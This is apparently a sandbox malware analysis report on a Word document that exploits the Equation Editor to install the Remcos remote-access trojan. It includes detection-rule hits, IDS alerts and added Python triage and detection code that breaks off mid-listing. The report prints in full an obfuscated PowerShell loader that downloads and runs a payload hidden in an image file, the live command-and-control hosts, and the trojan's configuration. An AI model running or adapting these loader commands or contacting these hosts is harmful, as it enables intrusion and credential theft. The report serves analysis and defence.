$type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = 
[System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
                    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3680, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs" , ProcessId: 3744, ProcessName: wscript.exe
                    Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3320, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? 
?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                    Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3320, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3796, TargetFilename: C:\Users\user\AppData\Local\Temp\lrqaccqg.vzv.ps1

                    Data Obfuscation

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ?
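The two PowerShell stages in this section fit together as follows. The outer process receives a `$Codigo` blob in which every `A` of a base64 string has been swapped for a filler token (rendered as `? ? ? ? ?` in this report; the token itself is not recoverable from the page): restoring `A` in the visible prefix `J?Bp?G0?YQBn?GU?VQBy?Gw?I??9?C??JwBo` gives `JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBo`, the UTF-16LE base64 of `$imageUrl = 'https://`, which is exactly how the inner command line begins. The inner script downloads `new_image.jpg` from archive.org, cuts out the text between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes it, hands the bytes to `[System.Reflection.Assembly]::Load`, and invokes `dnlib.IO.Home.VAI` with a first argument that is the next-stage URL written backwards. The Python below is an added triage helper for this pattern, not code from the report or from the malware; the filler token `@@`, the fake JPEG carrier and the `MZ` stub payload are constructed here, and `STAGE2_HEAD` and `VAI_FIRST_ARG` are copied from the command line printed above.

```python
"""Triage helpers for the two-stage PowerShell loader seen in this report.
Added example, not code from the report or the malware. All sample inputs
below are constructed; the filler token, carrier bytes and payload stub are
assumptions."""
import base64
from typing import Optional

# Marker strings exactly as they appear in the stage-2 command line.
START_MARK = b"<<BASE64_START>>"
END_MARK = b"<<BASE64_END>>"


def encode_stage1(script: str, filler: str) -> str:
    """Produce a stage-1 blob the way the loader expects it: UTF-16LE text,
    base64, then every 'A' replaced by the filler token. Used here only to
    build test input; the real token is not recoverable from the report."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return b64.replace("A", filler)


def decode_stage1(blob: str, filler: str) -> str:
    """Undo stage 1: restore 'A', base64-decode, read the bytes as UTF-16LE."""
    raw = base64.b64decode(blob.replace(filler, "A"), validate=True)
    return raw.decode("utf-16-le")


def extract_between_markers(carrier: bytes) -> Optional[bytes]:
    """Mirror stage 2: find the markers in the downloaded 'image' and
    base64-decode what lies between them. The PowerShell evaluates
    `$startIndex -ge 0 -and $endIndex -gt $startIndex` as a bare expression
    and carries on regardless; here the condition actually gates the decode."""
    start = carrier.find(START_MARK)
    end = carrier.find(END_MARK)
    if start < 0 or end <= start:
        return None
    inner = carrier[start + len(START_MARK):end]
    return base64.b64decode(inner, validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Assembly.Load needs a .NET PE image, so a real payload starts with 'MZ'."""
    return data[:2] == b"MZ"


def deobfuscate_argument(arg: str) -> str:
    """The first argument passed to dnlib.IO.Home.VAI is the next-stage URL
    written backwards; reversing it yields a plain http:// URL."""
    return arg[::-1]


# --- constructed sample data (not from the report) ---------------------------
FILLER = "@@"  # hypothetical stand-in for the token rendered as '? ? ? ? ?'
# Opening statement of the stage-2 script, as printed in the report.
STAGE2_HEAD = ("$imageUrl = 'https://ia601706.us.archive.org/2/items/"
               "new_image_20240905/new_image.jpg';")
# First VAI argument, as printed in the report.
VAI_FIRST_ARG = "txt.CHMR/05/481.142.932.58//:ptth"


def build_sample_carrier(payload: bytes) -> bytes:
    """A fake 'JPEG': a few bogus header bytes, then the marked base64 payload."""
    return (b"\xff\xd8\xff\xe0 JFIF noise " + START_MARK
            + base64.b64encode(payload) + END_MARK + b" trailer")


def triage_demo() -> dict:
    """Run the three steps on the constructed samples and return the results."""
    blob = encode_stage1(STAGE2_HEAD, FILLER)
    stub_pe = b"MZ\x90\x00" + b"\x00" * 60  # hypothetical payload stub, not a real binary
    payload = extract_between_markers(build_sample_carrier(stub_pe))
    return {
        "stage1_blob_prefix": blob[:16],
        "stage2_script": decode_stage1(blob, FILLER),
        "payload_is_pe": payload is not None and looks_like_pe(payload),
        "next_stage_url": deobfuscate_argument(VAI_FIRST_ARG),
    }


if __name__ == "__main__":
    for key, value in triage_demo().items():
        print(f"{key}: {value}")
```

Running the block as a script prints the four results. Two points worth taking from it: the real command's `$startIndex -ge 0 -and $endIndex -gt $startIndex` line is not a guard, so a carrier without markers drives `Substring` with negative indices and the script dies with an exception rather than exiting cleanly; and reversing the first VAI argument yields http://85.239.241.184/50/RMHC.txt, the same host that EQNEDT32.EXE contacts on port 80 in the Exploits section, so that address is the first thing to hunt for in proxy logs.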

                    Stealing of Sensitive Information

                    Source: Registry Key set | Author: Joe Security | Data: Details: 94 80 15 51 D0 65 B6 50 41 75 AB 59 6C D0 B6 DE 5B 82 DC 51 EE D7 CB 4A C6 C2 EC 20 E6 D7 68 F7 DD FB FD 48 BF 92 F0 14 1B 58 2E A1 0B D2 4F C2 CF A7 15 23 D4 B7 0D 25 B5 C3 3E 79 8A 86 82 DC EF E1 D0 57 EB FE 59 19 27 C2 5E A2 22 17 BB D1 ED 85 E0 15 F9 96 05 41 4A 6A 1B C3 A6 8F 2C 65 0E 4F 9C 6E DF F9 12 17 4C C0 2B 26 30 EC 9D 4B FF 38 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3988, TargetObject: HKEY_CURRENT_USER\Software\Rmc-OT0ZCG\exepath
                    Timestamp                        SID      Severity  Classtype                                      Source IP        Source Port  Destination IP  Destination Port  Protocol
                    2024-09-09T17:34:42.017603+0200  2020423  1         Exploit Kit Activity Detected                  85.239.241.184   80           192.168.2.22    49171             TCP
                    2024-09-09T17:34:42.017603+0200  2020425  1         Exploit Kit Activity Detected                  85.239.241.184   80           192.168.2.22    49171             TCP
                    2024-09-09T17:34:43.502450+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22     49172        45.89.247.65    2201              TCP
                    2024-09-09T17:34:45.019371+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22     49173        45.89.247.65    2201              TCP
                    2024-09-09T17:35:19.102190+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22     49175        45.89.247.65    2201              TCP
                    2024-09-09T17:35:19.260059+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22     49176        45.89.247.65    2201              TCP
                    2024-09-09T17:35:23.687948+0200  2036594  1         Malware Command and Control Activity Detected  192.168.2.22     49177        45.89.247.65    2201              TCP
                    2024-09-09T17:34:41.212366+0200  2049038  1         A Network Trojan was detected                  207.241.227.96   443          192.168.2.22    49170             TCP
                    2024-09-09T17:34:44.930337+0200  2803304  3         Unknown Traffic                                192.168.2.22     49174        178.237.33.50   80                TCP

                    AV Detection

                    Source: xrrwwstCMd.docx | Avira: detected
                    Source: dremom2.duckdns.org | Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc | Avira: detection malicious, Label: HEUR/Rtf.Malformed
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                    Source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "dremom2.duckdns.org:2201:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OT0ZCG", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: xrrwwstCMd.docx | ReversingLabs: Detection: 13%
                    Source: Yara match | File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.911284833.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_004338C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00404423 FreeLibrary,CryptUnprotectData,13_2_00404423
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_125e8abe-7

                    Exploits

                    Source: Yara match | File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 85.239.241.184 Port: 80
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe
                    Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr | Stream path '_1787386826/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
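The Sigma hits earlier on the page and the Exploits entries above describe one chain: WINWORD.EXE starts EQNEDT32.EXE with -Embedding, the Equation Editor connects to 85.239.241.184:80 and launches wscript.exe on a .vbs in AppData\Roaming, PowerShell downloads bytes and loads them as an assembly with a hidden window and a bypassed execution policy, and RegAsm.exe re-launches itself with /stext (listed under Stealing of Sensitive Information). The Python below is an added example of the corresponding detection logic run over constructed Sysmon-style events (EventID 1 process creation, EventID 3 network connection); it is not Sigma or Joe Sandbox code. The events are reconstructed from the report's process tree rather than copied from a log, the stage-2 PowerShell command line is abridged, treating PID 3796 as the stage-1 PowerShell is an assumption, and the final explorer-launched PowerShell event is invented as a benign control.

```python
"""Detection logic for the execution chain in this report, run over
constructed Sysmon-style events. Added example; not Sigma or Joe Sandbox
code. Events are reconstructed from the report's process tree (abridged
command lines), not copied from a real log."""
import re
from typing import Callable, Dict, List

Event = Dict[str, object]


def _name(ev: Event, key: str) -> str:
    """Basename of an image path, lower-cased ('' if the field is absent)."""
    return str(ev.get(key, "")).rsplit("\\", 1)[-1].lower()


def _cmd(ev: Event) -> str:
    return str(ev.get("CommandLine", "")).lower()


def office_spawns_eqnedt32(ev: Event) -> bool:
    """Word handing an OLE object to the Equation Editor (CVE-2017-11882 / CVE-2018-0802 pattern)."""
    return ev["EventID"] == 1 and _name(ev, "ParentImage") == "winword.exe" \
        and _name(ev, "Image") == "eqnedt32.exe"


def eqnedt32_child_process(ev: Event) -> bool:
    """The Equation Editor has no legitimate reason to start any process."""
    return ev["EventID"] == 1 and _name(ev, "ParentImage") == "eqnedt32.exe"


def eqnedt32_network(ev: Event) -> bool:
    """...nor to open a network connection."""
    return ev["EventID"] == 3 and _name(ev, "Image") == "eqnedt32.exe"


def wscript_from_appdata(ev: Event) -> bool:
    """Script host executing a file dropped under the user's AppData tree."""
    return ev["EventID"] == 1 and _name(ev, "Image") == "wscript.exe" \
        and "\\appdata\\" in _cmd(ev)


def ps_download_load_assembly(ev: Event) -> bool:
    """PowerShell that fetches bytes over the network and loads them as an assembly."""
    c = _cmd(ev)
    return ev["EventID"] == 1 and _name(ev, "Image") == "powershell.exe" \
        and re.search(r"\.download(data|string|file)\(", c) is not None \
        and "[system.reflection.assembly]::load" in c


def ps_hidden_bypass(ev: Event) -> bool:
    """Hidden window combined with an execution-policy bypass."""
    c = _cmd(ev)
    return ev["EventID"] == 1 and _name(ev, "Image") == "powershell.exe" \
        and "-windowstyle hidden" in c and "-executionpolicy bypass" in c


def regasm_stext_self_spawn(ev: Event) -> bool:
    """RegAsm.exe re-launching itself with /stext, the credential-dump step in this report."""
    return ev["EventID"] == 1 and _name(ev, "Image") == "regasm.exe" \
        and _name(ev, "ParentImage") == "regasm.exe" and "/stext" in _cmd(ev)


RULES: List[Callable[[Event], bool]] = [
    office_spawns_eqnedt32, eqnedt32_child_process, eqnedt32_network,
    wscript_from_appdata, ps_download_load_assembly, ps_hidden_bypass,
    regasm_stext_self_spawn,
]


def evaluate(events: List[Event]) -> Dict[int, List[str]]:
    """Map RecordId -> names of the rules it triggers; events with no hit are omitted."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        matched = [rule.__name__ for rule in RULES if rule(ev)]
        if matched:
            hits[int(ev["RecordId"])] = matched
    return hits


# --- constructed events modelled on the report's process tree ----------------
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"


def _proc(rid: int, pid: int, image: str, cmd: str, parent: str, ppid: int) -> Event:
    return {"RecordId": rid, "EventID": 1, "ProcessId": pid, "Image": image,
            "CommandLine": cmd, "ParentImage": parent, "ParentProcessId": ppid}


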